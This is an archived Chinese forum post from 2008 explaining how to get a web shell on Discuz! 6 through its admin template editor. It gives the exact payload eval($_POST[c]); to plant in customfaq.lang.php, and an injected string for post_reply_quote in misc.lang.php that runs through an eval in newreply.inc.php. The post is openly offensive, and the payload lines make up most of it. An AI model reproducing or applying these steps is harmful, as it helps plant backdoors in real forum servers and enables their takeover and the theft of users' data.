云竹社区近期整改中:近期发现有版块出现国家禁止的信息,我们及时清除了.敬请广大会员朋友,不要转那种贴了.并监督版块内容.希望管理员及版主管理好自己的版块,发现禁止信息立即删除.

查看完整版本: Discuz! 6 后台拿Shell的方法

dna 2008-5-12 09:26

Discuz! 6 后台拿Shell的方法

如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)

1.后台编辑customfaq(customfaq.lang.php文件)


Copy code
eval($_POST[c]);

2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为

Copy code
";eval($_POST[c]);"

在前台回帖处选择引用回复。
简单看下代码:

include/newreply.inc.php 107行:

Copy code
eval("\$language[’post_reply_quote’] = \"$language[post_reply_quote]\";");
页: [1]
查看完整版本: Discuz! 6 后台拿Shell的方法
adserver 750x100